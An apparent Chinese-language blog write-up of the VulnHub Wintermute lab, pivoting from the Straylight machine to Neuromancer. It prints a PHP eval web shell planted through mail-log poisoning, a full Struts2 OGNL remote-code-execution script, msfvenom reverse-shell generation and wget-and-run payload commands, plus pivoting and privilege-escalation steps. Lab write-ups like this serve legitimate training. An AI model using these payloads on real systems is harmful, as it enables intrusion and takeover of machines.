<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="挺有意思的一个靶机环境,学到不少东西,记录一下 参考wp:https:&#x2F;&#x2F;hackso.me&#x2F;wintermute-1-walkthrough&#x2F; 介绍 https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;wintermute-1,239&#x2F; 注意,这里环境搭建如下图  即我们的kali主机只能访问straylight靶机,而Neuromancer靶机处在内网,需要我们利用straylight">
<meta property="og:type" content="article">
<meta property="og:title" content="靶机渗透(wintermute)">
<meta property="og:url" content="http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/index.html">
<meta property="og:site_name" content="blacsheep&#39;s blog">
<meta property="og:description" content="挺有意思的一个靶机环境,学到不少东西,记录一下 参考wp:https:&#x2F;&#x2F;hackso.me&#x2F;wintermute-1-walkthrough&#x2F; 介绍 https:&#x2F;&#x2F;www.vulnhub.com&#x2F;entry&#x2F;wintermute-1,239&#x2F; 注意,这里环境搭建如下图  即我们的kali主机只能访问straylight靶机,而Neuromancer靶机处在内网,需要我们利用straylight">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2018-10-01T00:36:51.000Z">
<meta property="article:modified_time" content="2023-07-10T02:13:29.447Z">
<meta property="article:author" content="blacsheep">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>靶机渗透(wintermute)</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2018/10/02/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Ftemple-of-doom/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2018/09/21/cnss2018%E6%8B%9B%E6%96%B0wpweb/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&text=靶机渗透(wintermute)"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&title=靶机渗透(wintermute)"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&is_video=false&description=靶机渗透(wintermute)"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=靶机渗透(wintermute)&body=Check out this article: http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&title=靶机渗透(wintermute)"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&title=靶机渗透(wintermute)"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&title=靶机渗透(wintermute)"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&title=靶机渗透(wintermute)"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&name=靶机渗透(wintermute)&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2018/10/01/%E9%9D%B6%E6%9C%BA%E6%B8%97%E9%80%8Fwintermute/&t=靶机渗透(wintermute)"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#straylight"><span class="toc-number">2.</span> <span class="toc-text">Straylight</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ip%E5%92%8C%E7%AB%AF%E5%8F%A3"><span class="toc-number">2.1.</span> <span class="toc-text">ip和端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E5%92%8C%E6%8B%BFshell"><span class="toc-number">2.2.</span> <span class="toc-text">探测和拿shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#suid%E6%8F%90%E6%9D%83"><span class="toc-number">2.3.</span> <span class="toc-text">suid提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#neuromancer"><span class="toc-number">3.</span> <span class="toc-text">Neuromancer</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%BEip%E5%92%8C%E7%AB%AF%E5%8F%A3"><span class="toc-number">3.1.</span> <span class="toc-text">找ip和端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E5%92%8Cgetshell"><span class="toc-number">3.2.</span> <span class="toc-text">端口转发和getshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83"><span class="toc-number">3.3.</span> <span class="toc-text">提权</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        靶机渗透(wintermute)
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">blacsheep</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2018-10-01T00:36:51.000Z" class="dt-published" itemprop="datePublished">2018-10-01</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/pentest/">pentest</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>挺有意思的一个靶机环境,学到不少东西,记录一下 参考wp:<a
target="_blank" rel="noopener" href="https://hackso.me/wintermute-1-walkthrough/"
title="https://hackso.me/wintermute-1-walkthrough/">https://hackso.me/wintermute-1-walkthrough/</a></p>
<h2 id="介绍">介绍</h2>
<p><a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/wintermute-1,239/"
title="https://www.vulnhub.com/entry/wintermute-1,239/">https://www.vulnhub.com/entry/wintermute-1,239/</a>
注意,这里环境搭建如下图 <a
href="/images/2018/10/2018-10-01-02-32-09屏幕截图.png"><img
src="/images/2018/10/2018-10-01-02-32-09屏幕截图.png" /></a>
即我们的kali主机只能访问straylight靶机,而Neuromancer靶机处在内网,需要我们利用straylight作为跳板进行攻击</p>
<h2 id="straylight">Straylight</h2>
<h3 id="ip和端口">ip和端口</h3>
<p>靶机ip:192.168.1.101 端口扫描情况 <a
href="/images/2018/10/2018-10-01-02-35-03屏幕截图.png"><img
src="/images/2018/10/2018-10-01-02-35-03屏幕截图.png" /></a></p>
<h3 id="探测和拿shell">探测和拿shell</h3>
<p>到80端口,发现就一个静态页面给出背景,没什么有用的信息,到3000端口看下,发现一个登录页面,直接admin/admin一波成功登录,发现是ntop的管理页面
<a href="/images/2018/10/2018-10-01-02-38-05屏幕截图.png"><img
src="/images/2018/10/2018-10-01-02-38-05屏幕截图.png" /></a>
探测一下流量,发现有奇怪的流量 <a
href="/images/2018/10/2018-10-01-02-39-25屏幕截图.png"><img
src="/images/2018/10/2018-10-01-02-39-25屏幕截图.png" /></a>
到/turing-bolo看下,然后在case页面发现 <a
href="/images/2018/10/2018-10-01-02-40-46屏幕截图.png"><img
src="/images/2018/10/2018-10-01-02-40-46屏幕截图.png" /></a>
访问一下,发现内容相同,猜测有文件包含 <a
href="/images/2018/10/2018-10-01-02-42-31屏幕截图.png"><img
src="/images/2018/10/2018-10-01-02-42-31屏幕截图.png" /></a>
想到前面开了25端口,包含一下mail.log试试看 <a
href="/images/2018/10/2018-10-01-02-44-00屏幕截图.png"><img
src="/images/2018/10/2018-10-01-02-44-00屏幕截图.png" /></a>
发现成功包含,那么我们去写日志就好,连25端口 然后发送</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">root@kali:/home/blacsheep#  nc 192.168.1.101 25</span><br><span class="line">220 straylight ESMTP Postfix (Debian/GNU)</span><br><span class="line">MAILFROM:&lt;?php <span class="built_in">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>]);phpinfo();?&gt;</span><br><span class="line">221 2.7.0 Error: I can <span class="built_in">break</span> rules, too. Goodbye.</span><br></pre></td></tr></table></figure>
<p>发现代码得到执行 <a
href="/images/2018/10/2018-10-01-02-49-57屏幕截图.png"><img
src="/images/2018/10/2018-10-01-02-49-57屏幕截图.png" /></a> 蚁剑连一下
<a href="/images/2018/10/2018-10-01-02-54-57屏幕截图.png"><img
src="/images/2018/10/2018-10-01-02-54-57屏幕截图.png" /></a></p>
<h3 id="suid提权">suid提权</h3>
<p>具体可以去看这篇文章:<a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/86979"
title="https://www.anquanke.com/post/id/86979">https://www.anquanke.com/post/id/86979</a>
简而言之</p>
<blockquote>
<p>SUID（设置用户ID）是赋予文件的一种权限，它会出现在文件拥有者权限的执行位上，具有这种权限的文件会在其执行时，使调用者暂时获得该文件拥有者的权限。那么，为什么要给Linux二进制文件设置这种权限呢？其实原因有很多，例如，程序ping需要root权限才能打开网络套接字，但执行该程序的用户通常都是由普通用户，来验证与其他主机的连通性。
但是，如果某些现有的二进制文件和实用程序具有SUID权限的话，就可以在执行时将权限提升为root。</p>
</blockquote>
<p>可以用于提权的包括</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Nmap</span><br><span class="line">Vim</span><br><span class="line">find</span><br><span class="line">Bash</span><br><span class="line">More</span><br><span class="line">Less</span><br><span class="line">Nano</span><br><span class="line">cp</span><br></pre></td></tr></table></figure>
<p>查找有哪些具有suid权限位而且属于root的文件可以用下面的一些命令</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">find / -user root -perm -4000 -<span class="built_in">print</span> 2&gt;/dev/null</span><br><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br><span class="line">find / -user root -perm -4000 -<span class="built_in">exec</span> <span class="built_in">ls</span> -ldb &#123;&#125; ;</span><br></pre></td></tr></table></figure>
<p>靶机上面跑一下,得到下面一些文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">www-data@straylight:/var/www/html/turing-bolo$ find / -perm -4000 -user root 2&gt;/dev/null</span><br><span class="line">&lt;ing-bolo$ find / -perm -4000 -user root 2&gt;/dev/null</span><br><span class="line">/bin/su</span><br><span class="line">/bin/umount</span><br><span class="line">/bin/mount</span><br><span class="line">/bin/screen-4.5.0</span><br><span class="line">/bin/ping</span><br><span class="line">/usr/bin/gpasswd</span><br><span class="line">/usr/bin/chsh</span><br><span class="line">/usr/bin/chfn</span><br><span class="line">/usr/bin/passwd</span><br><span class="line">/usr/bin/newgrp</span><br><span class="line">/usr/lib/dbus-1.0/dbus-daemon-launch-helper</span><br><span class="line">/usr/lib/eject/dmcrypt-get-device</span><br><span class="line">/usr/lib/openssh/ssh-keysign</span><br></pre></td></tr></table></figure>
<p>发现有一个screen-4.5.0,searchsploit搜一下 <a
href="/images/2018/10/2018-10-01-03-07-15屏幕截图.png"><img
src="/images/2018/10/2018-10-01-03-07-15屏幕截图.png" /></a>
找到可以提权的漏洞了,蚁剑传上去,不过运行会出错,我们手动跑一下,然后拿到root
<a href="/images/2018/10/2018-10-01-03-33-00屏幕截图.png"><img
src="/images/2018/10/2018-10-01-03-33-00屏幕截图.png" /></a>
拿到flag和root下面的note <a
href="/images/2018/10/2018-10-01-12-33-39屏幕截图.png"><img
src="/images/2018/10/2018-10-01-12-33-39屏幕截图.png" /></a>
为了方便,我给straylight装了个ssh,加了个blacsheep用户,这样就可以有一个完整的shell了</p>
<h2 id="neuromancer">Neuromancer</h2>
<h3 id="找ip和端口">找ip和端口</h3>
<p>这个涉及到靶机找ip和端口,最容易想到的肯定是直接去下载一个nmap,然后编译一下扫,不过这里学到一些新知识,可以用shell的循环来扫ip和端口
找ip</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> p <span class="keyword">in</span> $(<span class="built_in">seq</span> 1 255);<span class="keyword">do</span> ping -c 1 192.168.29.<span class="variable">$p</span>  2&gt;&amp;1 ;<span class="keyword">done</span>  grep <span class="string">&quot;bytes from&quot;</span></span><br></pre></td></tr></table></figure>
<p><a href="/images/2018/10/2018-10-01-12-33-00屏幕截图.png"><img
src="/images/2018/10/2018-10-01-12-33-00屏幕截图.png" /></a>
找到靶机ip:192.168.29.4 然后扫它的端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> p <span class="keyword">in</span> $(<span class="built_in">seq</span> 1 65535);<span class="keyword">do</span> nc -nvz -w 1 192.168.29.4 <span class="variable">$p</span> 2&gt;&amp;1 ;<span class="keyword">done</span>  grep -v <span class="string">&quot;refused&quot;</span></span><br></pre></td></tr></table></figure>
<p><a href="/images/2018/10/2018-10-01-12-32-18屏幕截图.png"><img
src="/images/2018/10/2018-10-01-12-32-18屏幕截图.png" /></a></p>
<h3 id="端口转发和getshell">端口转发和getshell</h3>
<p>straylight靶机上面运行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">root@straylight:~# socat tcp-listen:8009,fork tcp:192.168.29.4:8009&amp;</span><br><span class="line">[1] 3740</span><br><span class="line">root@straylight:~# socat tcp-listen:8080,fork tcp:192.168.29.4:8080&amp;</span><br><span class="line">[2] 3765</span><br><span class="line">root@straylight:~# socat tcp-listen:34483,fork tcp:192.168.29.4:34483&amp;</span><br><span class="line">[3] 3803</span><br></pre></td></tr></table></figure>
<p><a href="/images/2018/10/2018-10-01-12-41-02屏幕截图.png"><img
src="/images/2018/10/2018-10-01-12-41-02屏幕截图.png" /></a>
然后去8080端口,发现是个tomcat的manage页面,尝试爆破一下,失败了 <a
href="/images/2018/10/2018-10-01-12-45-58屏幕截图.png"><img
src="/images/2018/10/2018-10-01-12-45-58屏幕截图.png" /></a>
想到之前note里面的那个路径,访问一下 <a
href="/images/2018/10/2018-10-01-12-46-53屏幕截图.png"><img
src="/images/2018/10/2018-10-01-12-46-53屏幕截图.png" /></a>
找一下这个有没有漏洞 <a
href="/images/2018/10/2018-10-01-12-48-08屏幕截图.png"><img
src="/images/2018/10/2018-10-01-12-48-08屏幕截图.png" /></a>
发现有个代码执行的漏洞,用一下,但是发现并不能执行,这里有人换成了bash的代码,利用curl换掉了requests,可以执行,贴个代码</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#!/bin/bash</span></span><br><span class="line"></span><br><span class="line">LHOST=192.168.30.128</span><br><span class="line">LPORT=4321</span><br><span class="line">RHOST=192.168.30.129</span><br><span class="line">RPORT=8080</span><br><span class="line">TARGETURI=struts2_2.3.15.1-showcase/integration</span><br><span class="line">URL=http://<span class="variable">$RHOST</span>:<span class="variable">$RPORT</span>/<span class="variable">$TARGETURI</span>/saveGangster.action</span><br><span class="line">CMD=<span class="string">&quot;<span class="variable">$1</span>&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;<span class="variable">$&#123;PAYLOAD&#125;</span>%&#123;&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;<span class="variable">$&#123;PAYLOAD&#125;</span>(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;<span class="variable">$&#123;PAYLOAD&#125;</span>(#_memberAccess?(#_memberAccess=#dm):&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;<span class="variable">$&#123;PAYLOAD&#125;</span>((#container=#context[&#x27;com.opensymphony.xwork2.ActionContext.container&#x27;]).&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;<span class="variable">$&#123;PAYLOAD&#125;</span>(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;<span class="variable">$&#123;PAYLOAD&#125;</span>(#ognlUtil.getExcludedPackageNames().clear()).&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;<span class="variable">$&#123;PAYLOAD&#125;</span>(#ognlUtil.getExcludedClasses().clear()).&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;<span class="variable">$&#123;PAYLOAD&#125;</span>(#context.setMemberAccess(#dm)))).&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;<span class="variable">$&#123;PAYLOAD&#125;</span>(@java.lang.Runtime@getRuntime().exec(&#x27;<span class="variable">$CMD</span>&#x27;))&quot;</span></span><br><span class="line">PAYLOAD=<span class="string">&quot;<span class="variable">$&#123;PAYLOAD&#125;</span>&#125;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="title">usage</span></span>() &#123;</span><br><span class="line">  <span class="built_in">echo</span> <span class="string">&quot;Usage: <span class="subst">$(basename $0)</span> [COMMAND]&quot;</span> &gt;&amp;2</span><br><span class="line">  <span class="built_in">exit</span> 1</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> [ <span class="variable">$#</span> -ne 1 ]; <span class="keyword">then</span></span><br><span class="line">  usage</span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"></span><br><span class="line">curl -s \</span><br><span class="line">     -H <span class="string">&quot;Referer: http://<span class="variable">$RHOST</span>:<span class="variable">$RPORT</span>/<span class="variable">$TARGETURI</span>/editGangster&quot;</span> \</span><br><span class="line">     --data-urlencode <span class="string">&quot;name=<span class="variable">$PAYLOAD</span>&quot;</span> \</span><br><span class="line">     --data-urlencode <span class="string">&quot;age=20&quot;</span> \</span><br><span class="line">     --data-urlencode <span class="string">&quot;__checkbox_bustedBefore=true&quot;</span> \</span><br><span class="line">     --data-urlencode <span class="string">&quot;description=1&quot;</span> \</span><br><span class="line">     -o /dev/null \</span><br><span class="line">     <span class="variable">$URL</span></span><br></pre></td></tr></table></figure>
<p>不过nc版本不支持-e,而且由于我们是使用<code>java.lang.Runtime</code>来执行命令,所以管道符也不能用..
<a href="/images/2018/10/2018-10-01-13-29-25屏幕截图.png"><img
src="/images/2018/10/2018-10-01-13-29-25屏幕截图.png" /></a>
那么我们再做一个端口转发,把访问192.168.1.101的4444的流量转到本机</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">root@straylight:~# socat tcp-listen:4444,fork tcp:192.168.1.105:4444 &amp;</span><br><span class="line">[4] 5820</span><br></pre></td></tr></table></figure>
<p>然后msfvenom生成木马,scp传到straylight</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.29.3 lport=4444 -f elf -o shell</span><br><span class="line"></span><br><span class="line">scp  ./shell  blacsheep@192.168.1.101:/tmp/</span><br></pre></td></tr></table></figure>
<p><a href="/images/2018/10/2018-10-01-13-25-43屏幕截图.png"><img
src="/images/2018/10/2018-10-01-13-25-43屏幕截图.png" /></a>
把shell放到web目录,然后让Neuromancer去wget下下来执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">./exploit.sh <span class="string">&quot;wget -O /tmp/shell 192.168.29.3/shell&quot;</span></span><br><span class="line">./exploit.sh <span class="string">&quot;chmod 777 /tmp/shell&quot;</span></span><br><span class="line">./exploit.sh <span class="string">&quot;sh -c /tmp/shell&quot;</span></span><br></pre></td></tr></table></figure>
<p><a href="/images/2018/10/2018-10-01-13-47-40屏幕截图.png"><img
src="/images/2018/10/2018-10-01-13-47-40屏幕截图.png" /></a>
然后拿到meterpreter <a
href="/images/2018/10/2018-10-01-13-49-42屏幕截图.png"><img
src="/images/2018/10/2018-10-01-13-49-42屏幕截图.png" /></a></p>
<h3 id="提权">提权</h3>
<p>先写个ssh-key方便连接 <a
href="/images/2018/10/2018-10-01-14-13-53屏幕截图.png"><img
src="/images/2018/10/2018-10-01-14-13-53屏幕截图.png" /></a>
然后把这个写到用户目录的.ssh/authorized_keys <a
href="/images/2018/10/2018-10-01-14-15-43屏幕截图.png"><img
src="/images/2018/10/2018-10-01-14-15-43屏幕截图.png" /></a> 然后ssh -i
连接 <a href="/images/2018/10/2018-10-01-14-16-12屏幕截图.png"><img
src="/images/2018/10/2018-10-01-14-16-12屏幕截图.png" /></a>
查看内核信息</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ta@neuromancer:/tmp$ <span class="built_in">uname</span> -a</span><br><span class="line">Linux neuromancer 4.4.0-116-generic <span class="comment">#140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux</span></span><br></pre></td></tr></table></figure>
<p>searchsploit找一下,刚刚好有个版本一致的 <a
href="/images/2018/10/2018-10-01-14-25-29屏幕截图.png"><img
src="/images/2018/10/2018-10-01-14-25-29屏幕截图.png" /></a>
目标机没有gcc,本地编译传上去 <a
href="/images/2018/10/2018-10-01-14-23-58屏幕截图.png"><img
src="/images/2018/10/2018-10-01-14-23-58屏幕截图.png" /></a>
目标机运行,拿到shell <a
href="/images/2018/10/2018-10-01-14-27-21屏幕截图.png"><img
src="/images/2018/10/2018-10-01-14-27-21屏幕截图.png" /></a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#straylight"><span class="toc-number">2.</span> <span class="toc-text">Straylight</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ip%E5%92%8C%E7%AB%AF%E5%8F%A3"><span class="toc-number">2.1.</span> <span class="toc-text">ip和端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8E%A2%E6%B5%8B%E5%92%8C%E6%8B%BFshell"><span class="toc-number">2.2.</span> <span class="toc-text">探测和拿shell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#suid%E6%8F%90%E6%9D%83"><span class="toc-number">2.3.</span> <span class="toc-text">suid提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#neuromancer"><span class="toc-number">3.</span> <span class="toc-text">Neuromancer</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" 